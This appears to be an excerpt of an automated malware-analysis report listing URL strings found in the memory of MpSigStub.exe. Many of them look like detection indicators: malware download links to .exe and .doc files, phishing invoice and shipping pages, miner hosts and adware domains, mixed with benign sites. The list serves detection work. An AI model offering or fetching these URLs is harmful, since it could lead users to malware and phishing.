Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pp1234.net/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.profilestylez.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.prostol.com/m.html
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.rezababy.blogfa.com
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp	String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.symantec.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebestofnet.com/exit/
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://www.tumbosco.com/order/p.o_76434.zip)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://www.universal101.com/upd
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv1.info
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.voxcards.com.br
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://www.wajam.com/webenhancer/logging
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-touch.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.wintask16.com/exc2.txt
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://www.woothemes.com/flexslider/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www1.yzsc.cn/cash
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://xmr.enjoytopic.tk
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://xx.522love.cn/tool/down
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://xxxlive.info/spot4
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://ydlevents.com.my/www/ucountredeem/php/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://youssef-tawil.blogspot.com/
